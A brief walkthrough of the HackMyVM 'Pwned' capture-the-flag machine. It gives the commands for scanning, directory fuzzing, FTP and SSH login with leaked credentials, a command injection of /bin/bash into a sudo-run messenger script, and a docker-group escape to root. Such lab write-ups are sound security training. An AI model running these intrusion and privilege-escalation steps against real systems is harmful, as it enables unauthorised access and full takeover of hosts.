## hackmyvm pwned
[Link CTF](https://hackmyvm.eu/machines/machine.php?vm=Pwned)

1. Scan subnet 192.168.1.0/24

        sudo nmap 192.168.1.0/24

2. set variable ip

        ip=192.168.1.194

3. Full Scan IP

        sudo nmap -n -Pn -sS -p21,22,80 $ip --open

4.  Get info from page

        curl $ip
        curl $ip/robots.txt

5. Check path in robots.txt

        curl $ip/nothing

6. We use FUZZ to check others path in URL 

        sudo wfuzz -c --hc=404 -t 500 -L -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u $ip/FUZZ

7. We obtain path nothing, server-status and hidden_texts. Get secret_dir from hidden_text

        curl http://192.168.1.194/hidden_text/secret.dic > secret.dic

8. We use FUZZ with secret.dir

        sudo wfuzz -c --hc=404 -t 500 -L -w secret.dic -u $ip/FUZZ 

9. We get path /pwned.vuln and check code an get user and password ftp

10. Connecy via ftp and get notes.txt and id_rsa

        ftp -u ftpuser,'B0ss_B!TcH' $ip

11. Connect via ssh ussing info in notes.txt and id_rsi

        sudo ssh ariana@$ip -i id_rsa

12. Obtain user first flag 

        cat user1.txt 

13. Sheck sudo permission

        sudo -l

14. Run script /home/messenger.sh with selena

        sudo -u selena /home/messenger.sh

        Welcome to linux.messenger 


        ariana:
        selena:
        ftpuser:

        Enter username to send message : aa

        Enter message for aa :/bin/bash

        Sending message to aa 

        id
        uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
        script /dev/null -c bash
        Script started, file is /dev/null
        selena@pwned:/home/ariana$ 


15. Found Falg of selena in /home/selena

        ls /home/selena
        selena-personal.diary  user2.txt
        cat /home/selena/*
        Its Selena personal Diary :::

        Today Ariana fight with me for Ajay. so i left her ssh key on FTP. now she resposible for the leak.

        **************************************

        You are near to me. you found selena too.

        Try harder to catch me

16. Check files with write permisison

        find / -perm -4000 2>/dev/null

17. Check groups of selena an sploit docker vuilnerability

        selena@pwned:/home/ariana$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
        # id
        uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)

Powered by [Jose Santos](https://www.linkedin.com/in/jose-santos-guijarro)
